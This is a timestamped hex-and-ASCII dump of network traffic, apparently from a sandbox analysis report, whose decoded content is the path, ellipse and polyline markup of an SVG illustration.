                                                                                                                                                                                                                                                        2023-10-09 13:50:58 UTC1278INData Raw: 2c 32 38 34 2e 39 31 5a 22 2f 3e 3c 72 65 63 74 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 31 33 22 20 78 3d 22 39 33 30 2e 31 36 22 20 79 3d 22 32 38 35 2e 32 39 22 20 77 69 64 74 68 3d 22 33 2e 37 35 22 20 68 65 69 67 68 74 3d 22 33 2e 31 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 38 36 34 2e 30 36 20 35 37 33 2e 36 37 29 20 72 6f 74 61 74 65 28 2d 31 38 30 29 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 31 34 22 20 64 3d 22 4d 39 33 33 2e 37 32 2c 32 39 35 2e 38 33 61 33 31 2e 37 31 2c 33 31 2e 37 31 2c 30 2c 30 2c 31 2d 36 2e 32 2e 35 31 2c 33 32 2e 34 33 2c 33 32 2e 34 33 2c 30 2c 30 2c 31 2d 36 2e 32 34 2d 2e 35 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 31 35 22 20 64 3d 22 4d 39 33
                                                                                                                                                                                                                                                        Data Ascii: ,284.91Z"/><rect class="cls-113" x="930.16" y="285.29" width="3.75" height="3.1" transform="translate(1864.06 573.67) rotate(-180)"/><path class="cls-114" d="M933.72,295.83a31.71,31.71,0,0,1-6.2.51,32.43,32.43,0,0,1-6.24-.51"/><path class="cls-115" d="M93
                                                                                                                                                                                                                                                        2023-10-09 13:50:58 UTC1294INData Raw: 30 2c 30 2c 30 2c 2e 37 36 2e 36 2c 36 2e 35 38 2c 36 2e 35 38 2c 30 2c 30 2c 30 2c 32 2e 33 35 2c 31 2e 30 37 2c 37 2e 32 38 2c 37 2e 32 38 2c 30 2c 30 2c 30 2c 32 2e 33 37 2d 2e 30 39 6c 31 2e 38 37 2d 2e 32 37 61 35 2e 32 34 2c 35 2e 32 34 2c 30 2c 30 2c 30 2c 32 2e 35 38 2d 2e 38 35 41 32 2e 39 31 2c 32 2e 39 31 2c 30 2c 30 2c 30 2c 39 30 35 2e 35 37 2c 32 35 33 2e 35 32 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 33 34 22 20 64 3d 22 4d 38 39 36 2e 39 32 2c 32 34 36 2e 37 33 61 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 37 34 2d 2e 35 35 63 30 2d 2e 34 32 2e 32 37 2d 2e 37 39 2e 32 32 2d 31 2e 32 32 61 36 2e 34 38 2c 36 2e 34 38 2c 30 2c 30 2c 31 2c 32 2e 33 32 2d 2e 30 35 63 2d 2e 35 38 2e 39 34 2e 33 34 2c 32 2e 31 2c
                                                                                                                                                                                                                                                        Data Ascii: 0,0,0,.76.6,6.58,6.58,0,0,0,2.35,1.07,7.28,7.28,0,0,0,2.37-.09l1.87-.27a5.24,5.24,0,0,0,2.58-.85A2.91,2.91,0,0,0,905.57,253.52Z"/><path class="cls-134" d="M896.92,246.73a2.36,2.36,0,0,1,.74-.55c0-.42.27-.79.22-1.22a6.48,6.48,0,0,1,2.32-.05c-.58.94.34,2.1,
                                                                                                                                                                                                                                                        2023-10-09 13:50:58 UTC1310INData Raw: 36 37 2c 34 2e 37 36 2e 36 36 2c 37 2e 32 61 31 30 2e 36 34 2c 31 30 2e 36 34 2c 30 2c 30 2c 31 2d 32 2d 2e 31 38 2c 39 2c 39 2c 30 2c 30 2c 31 2d 31 2e 31 33 2d 2e 33 31 63 2d 2e 32 32 2d 2e 30 35 2d 31 2e 32 36 2d 2e 34 35 2d 31 2e 34 35 2d 2e 33 73 2e 31 38 2e 37 2e 33 32 2e 38 39 63 2e 32 36 2e 33 37 2e 33 34 2e 34 36 2e 32 33 2e 39 61 2e 38 33 2e 38 33 2c 30 2c 30 2c 31 2d 2e 35 31 2e 36 38 63 2d 2e 31 33 2e 30 36 2d 2e 38 36 2e 32 32 2d 31 2c 2e 31 33 2c 31 2e 32 34 2c 31 2e 31 39 2c 33 2e 32 36 2c 31 2c 34 2e 38 36 2c 31 2e 32 6c 32 2e 34 33 2e 32 34 63 2e 36 2e 30 36 2c 31 2e 31 37 2e 31 33 2c 31 2e 34 35 2d 2e 35 34 61 33 2e 38 37 2c 33 2e 38 37 2c 30 2c 30 2c 30 2c 2e 31 32 2d 31 2e 33 31 63 30 2d 31 2d 2e 31 36 2d 32 2d 2e 32 2d 33 43 38 32 37
                                                                                                                                                                                                                                                        Data Ascii: 67,4.76.66,7.2a10.64,10.64,0,0,1-2-.18,9,9,0,0,1-1.13-.31c-.22-.05-1.26-.45-1.45-.3s.18.7.32.89c.26.37.34.46.23.9a.83.83,0,0,1-.51.68c-.13.06-.86.22-1,.13,1.24,1.19,3.26,1,4.86,1.2l2.43.24c.6.06,1.17.13,1.45-.54a3.87,3.87,0,0,0,.12-1.31c0-1-.16-2-.2-3C827
                                                                                                                                                                                                                                                        2023-10-09 13:50:58 UTC1326INData Raw: 2d 33 2d 31 33 2e 35 2d 33 6c 2d 33 30 2e 36 39 2d 33 2e 35 37 63 2d 31 2e 32 34 2d 2e 30 38 2d 34 2d 34 2d 34 2e 38 33 2d 34 2e 39 61 34 33 2e 30 37 2c 34 33 2e 30 37 2c 30 2c 30 2c 30 2d 34 2e 31 37 2d 33 2e 39 35 63 2d 32 2e 30 36 2d 31 2e 37 36 2d 33 2e 39 34 2d 33 2e 38 2d 35 2e 38 39 2d 35 2e 36 38 6c 2d 31 30 2d 39 2e 36 34 63 2d 36 2e 33 36 2d 31 2e 35 36 2d 31 32 2e 37 36 2d 33 2d 31 39 2e 31 32 2d 34 2e 35 36 2d 34 2e 33 35 2d 31 2e 30 38 2d 38 2e 37 34 2d 36 2e 31 33 2d 31 32 2e 38 36 2d 37 2e 38 31 2d 31 2e 32 33 2d 35 2e 31 34 2d 31 2e 35 38 2d 39 2d 33 2e 39 35 2d 31 37 2e 34 38 2d 2e 30 36 2d 2e 32 32 2c 31 2e 32 32 2d 39 2c 31 2e 36 38 2d 39 2c 31 32 2e 30 39 2e 31 34 2c 32 31 2c 2e 35 36 2c 33 33 2c 2e 36 35 2c 32 33 2c 2e 31 38 2c 34 35
                                                                                                                                                                                                                                                        Data Ascii: -3-13.5-3l-30.69-3.57c-1.24-.08-4-4-4.83-4.9a43.07,43.07,0,0,0-4.17-3.95c-2.06-1.76-3.94-3.8-5.89-5.68l-10-9.64c-6.36-1.56-12.76-3-19.12-4.56-4.35-1.08-8.74-6.13-12.86-7.81-1.23-5.14-1.58-9-3.95-17.48-.06-.22,1.22-9,1.68-9,12.09.14,21,.56,33,.65,23,.18,45
                                                                                                                                                                                                                                                        2023-10-09 13:50:59 UTC1343INData Raw: 72 79 3d 22 30 2e 31 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 37 20 35 36 33 2e 36 34 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 34 30 2e 36 39 22 20 63 79 3d 22 32 31 34 2e 30 39 22 20 72 78 3d 22 30 2e 31 35 22 20 72 79 3d 22 30 2e 31 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 36 2e 38 36 20 35 36 33 2e 39 39 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 33 39 2e 30 38 22 20 63 79 3d 22 32 31 34 2e 30 35 22 20 72 78 3d 22 30 2e 31 35 22 20
                                                                                                                                                                                                                                                        Data Ascii: ry="0.19" transform="translate(47 563.64) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="840.69" cy="214.09" rx="0.15" ry="0.19" transform="translate(46.86 563.99) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="839.08" cy="214.05" rx="0.15"
                                                                                                                                                                                                                                                        2023-10-09 13:50:59 UTC1359INData Raw: 63 79 3d 22 32 33 33 2e 36 37 22 20 72 78 3d 22 30 2e 31 37 22 20 72 79 3d 22 30 2e 32 32 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 32 38 2e 37 38 20 35 35 30 2e 37 36 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 31 32 2e 39 38 22 20 63 79 3d 22 32 33 34 2e 30 39 22 20 72 78 3d 22 30 2e 31 37 22 20 72 79 3d 22 30 2e 32 32 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 32 38 2e 36 33 20 35 35 31 2e 31 35 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 31 33 2e 34
                                                                                                                                                                                                                                                        Data Ascii: cy="233.67" rx="0.17" ry="0.22" transform="translate(28.78 550.76) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="812.98" cy="234.09" rx="0.17" ry="0.22" transform="translate(28.63 551.15) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="813.4
                                                                                                                                                                                                                                                        2023-10-09 13:50:59 UTC1375INData Raw: 73 20 31 20 6e 6f 72 6d 61 6c 20 6e 6f 6e 65 20 72 75 6e 6e 69 6e 67 3b 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 20 73 76 67 2d 61 6e 69 6d 22 20 64 3d 22 4d 38 30 38 2e 38 35 2c 32 38 31 2e 37 37 61 31 2e 38 35 2c 31 2e 38 35 2c 30 2c 30 2c 31 2c 2e 31 31 2d 2e 33 31 63 2d 2e 33 31 2e 36 37 2d 31 2c 31 2d 31 2e 30 39 2c 31 2e 37 38 61 31 31 2c 31 31 2c 30 2c 30 2c 30 2d 2e 31 35 2c 31 2e 31 35 63 30 2c 2e 34 34 2e 32 2e 36 32 2e 33 31 2c 31 2c 2e 32 32 2e 37 34 2d 2e 31 37 2c 31 2e 37 35 2d 31 2e 30 37 2c 31 2e 34 35 2d 2e 36 39 2d 2e 32 33 2d 31 2e 31 2d 31 2d 31 2e 36 2d 31 2e 34 35 61 31 31 2e 37 36 2c 31 31 2e 37 36 2c 30 2c 30 2c 31 2d 31 2e 38 39 2d 31 2e 37 37 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c
                                                                                                                                                                                                                                                        Data Ascii: s 1 normal none running;"></path><path class="cls-38 svg-anim" d="M808.85,281.77a1.85,1.85,0,0,1,.11-.31c-.31.67-1,1-1.09,1.78a11,11,0,0,0-.15,1.15c0,.44.2.62.31,1,.22.74-.17,1.75-1.07,1.45-.69-.23-1.1-1-1.6-1.45a11.76,11.76,0,0,1-1.89-1.77,2.39,2.39,0,0,
                                                                                                                                                                                                                                                        2023-10-09 13:50:59 UTC1391INData Raw: 35 2e 36 36 20 35 39 38 2e 34 35 20 32 32 31 2e 37 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 32 22 20 70 6f 69 6e 74 73 3d 22 35 37 39 2e 35 34 20 32 31 31 2e 31 32 20 35 39 32 2e 36 35 20 32 31 36 2e 32 33 20 35 39 39 2e 32 20 32 32 30 2e 32 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 32 22 20 70 6f 69 6e 74 73 3d 22 35 37 37 2e 38 32 20 32 33 35 2e 32 32 20 35 39 30 2e 35 20 32 33 39 2e 35 34 20 35 39 37 2e 38 31 20 32 33 36 2e 33 37 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 33 22 20 70 6f 69 6e 74 73 3d 22 35 37 37 2e 38 32 20 32 35 30 2e 33 31 20 35 39 30 2e 35 20 32
                                                                                                                                                                                                                                                        Data Ascii: 5.66 598.45 221.7"></polyline><polyline class="cls-52" points="579.54 211.12 592.65 216.23 599.2 220.2"></polyline><polyline class="cls-52" points="577.82 235.22 590.5 239.54 597.81 236.37"></polyline><polyline class="cls-53" points="577.82 250.31 590.5 2
                                                                                                                                                                                                                                                        2023-10-09 13:50:59 UTC1407INData Raw: 61 6e 69 6d 22 20 64 3d 22 4d 36 30 39 2e 33 33 2c 33 30 34 2e 38 39 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 30 2c 2e 32 2d 2e 32 38 63 2d 2e 34 2e 36 37 2d 2e 33 31 2c 31 2e 34 38 2d 2e 39 2c 32 61 39 2e 39 34 2c 39 2e 39 34 2c 30 2c 30 2c 31 2d 2e 39 32 2e 38 63 2d 2e 33 38 2e 32 37 2d 2e 36 35 2e 32 2d 31 2c 2e 33 33 2d 2e 37 38 2e 32 35 2d 31 2e 34 33 2c 31 2e 31 37 2d 2e 36 34 2c 31 2e 37 38 61 35 2e 31 38 2c 35 2e 31 38 2c 30 2c 30 2c 30 2c 32 2e 32 31 2e 35 34 2c 31 32 2e 31 31 2c 31 32 2e 31 31 2c 30 2c 30 2c 30 2c 32 2e 36 35 2e 36 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 30 2c 31 2e 34 35 2d 2e 35 35 63 2e 34 35 2d 2e 34 38 2e 32 38 2d 31 2e 35 37 2e 32 34 2d 32 2e 31 36 2d 2e 30 36 2d 31 2d 2e 34 33 2d 31 2e 39 32 2d 2e 34 31 2d 32 2e
                                                                                                                                                                                                                                                        Data Ascii: anim" d="M609.33,304.89a1.62,1.62,0,0,0,.2-.28c-.4.67-.31,1.48-.9,2a9.94,9.94,0,0,1-.92.8c-.38.27-.65.2-1,.33-.78.25-1.43,1.17-.64,1.78a5.18,5.18,0,0,0,2.21.54,12.11,12.11,0,0,0,2.65.6,2.52,2.52,0,0,0,1.45-.55c.45-.48.28-1.57.24-2.16-.06-1-.43-1.92-.41-2.
                                                                                                                                                                                                                                                        2023-10-09 13:50:59 UTC1423INData Raw: 30 2c 30 2d 2e 35 32 2d 2e 30 36 2c 31 2e 35 34 2c 31 2e 35 34 2c 30 2c 30 2c 30 2d 2e 37 2e 31 35 2c 31 2e 34 33 2c 31 2e 34 33 2c 30 2c 30 2c 30 2d 2e 35 2e 34 31 2c 31 2e 37 37 2c 31 2e 37 37 2c 30 2c 30 2c 30 2d 2e 33 2e 35 38 2c 32 2e 36 31 2c 32 2e 36 31 2c 30 2c 30 2c 30 2d 2e 30 39 2e 36 39 76 33 68 2d 31 2e 31 33 56 37 31 2e 31 36 43 38 39 34 2e 34 39 2c 37 31 2c 38 39 34 2e 34 39 2c 37 30 2e 38 31 2c 38 39 34 2e 34 38 2c 37 30 2e 35 37 5a 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 32 22 20 64 3d 22 4d 39 30 30 2e 31 35 2c 36 37 2e 38 38 61 2e 36 37 2e 36 37 2c 30 2c 30 2c 31 2d 2e 32 32 2e 35 32 2e 37 32 2e 37 32 2c 30 2c 30 2c 31 2d 2e 35 33 2e 32 2e 36 38 2e 36 38 2c 30 2c 30 2c 31 2d 2e 35 32 2d 2e 32 31 2e
                                                                                                                                                                                                                                                        Data Ascii: 0,0-.52-.06,1.54,1.54,0,0,0-.7.15,1.43,1.43,0,0,0-.5.41,1.77,1.77,0,0,0-.3.58,2.61,2.61,0,0,0-.09.69v3h-1.13V71.16C894.49,71,894.49,70.81,894.48,70.57Z"></path><path class="cls-2" d="M900.15,67.88a.67.67,0,0,1-.22.52.72.72,0,0,1-.53.2.68.68,0,0,1-.52-.21.
                                                                                                                                                                                                                                                        2023-10-09 13:50:59 UTC1439INData Raw: 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 30 30 2e 31 31 2c 32 30 31 2e 37 32 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 41 32 2e 35 33 2c 32 2e 35 33 2c 30 2c 30 2c 31 2c 36 39 36 2c 32 30 33 61 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                        Data Ascii: 51-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.86"></path><path class="cls-4" d="M700.11,201.72a1.73,1.73,0,0,1-.78,2.24A2.53,2.53,0,0,1,696,203a2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"></path><path class="cls-4" d="M
                                                                                                                                                                                                                                                        2023-10-09 13:50:59 UTC1455INData Raw: 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 33 31 2e 35 37 2c 32 39 37 2e 38 34 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 33 31 2e 33 34 2c 32 39 30 2e 39 31 61 31 2e 37
                                                                                                                                                                                                                                                        Data Ascii: 0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"></path><path class="cls-4" d="M731.57,297.84a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.39,2.39,0,0,1,.52-2.88,2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M731.34,290.91a1.7
                                                                                                                                                                                                                                                        2023-10-09 13:50:59 UTC1471INData Raw: 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 34 39 2e 34 32 2c 32 30 30 2e 30 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 34 39 2e 31 39 2c 31 39 33 2e 31 32 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d
                                                                                                                                                                                                                                                        Data Ascii: th><path class="cls-4" d="M749.42,200.06a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.11,2.11,0,0,1,.16,2.85"></path><path class="cls-4" d="M749.19,193.12a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-
                                                                                                                                                                                                                                                        2023-10-09 13:50:59 UTC1487INData Raw: 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 38 30 2e 36 35 2c 32 38 39 2e 32 34 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32
                                                                                                                                                                                                                                                        Data Ascii: ,1.72,0,0,1-.78,2.23,2.5,2.5,0,0,1-3.33-.94,2.37,2.37,0,0,1,.51-2.88,2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M780.65,289.24a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC1503INData Raw: 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 39 38 2e 35 2c 31 39 31 2e 34 35 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68
                                                                                                                                                                                                                                                        Data Ascii: .34-.94,2.41,2.41,0,0,1,.52-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"></path><path class="cls-4" d="M798.5,191.45a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"></path
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC1519INData Raw: 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 30 2c 32 38 37 2e 35 37 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 32 39 2e 37 32 2c 32 38 30 2e 36 33 61 31 2e 37 32 2c 31 2e 37
                                                                                                                                                                                                                                                        Data Ascii: 0,1,2.89,0,2.11,2.11,0,0,1,.16,2.86"></path><path class="cls-4" d="M830,287.57a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"></path><path class="cls-4" d="M829.72,280.63a1.72,1.7
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC1535INData Raw: 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 37 2e 38 31 2c 31 38 39 2e 37 39 41 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2c 38 34 37 2c 31 39 32 61 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 37 2e 35 37 2c 31 38 32 2e 38 35 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 31
                                                                                                                                                                                                                                                        Data Ascii: 0,1,.16,2.86"></path><path class="cls-4" d="M847.81,189.79A1.72,1.72,0,0,1,847,192a2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"></path><path class="cls-4" d="M847.57,182.85a1.73,1.73,0,0,1-.78,2.24,2.51
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC1551INData Raw: 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 32 37 2c 32 38 35 2e 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2c 32 37 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 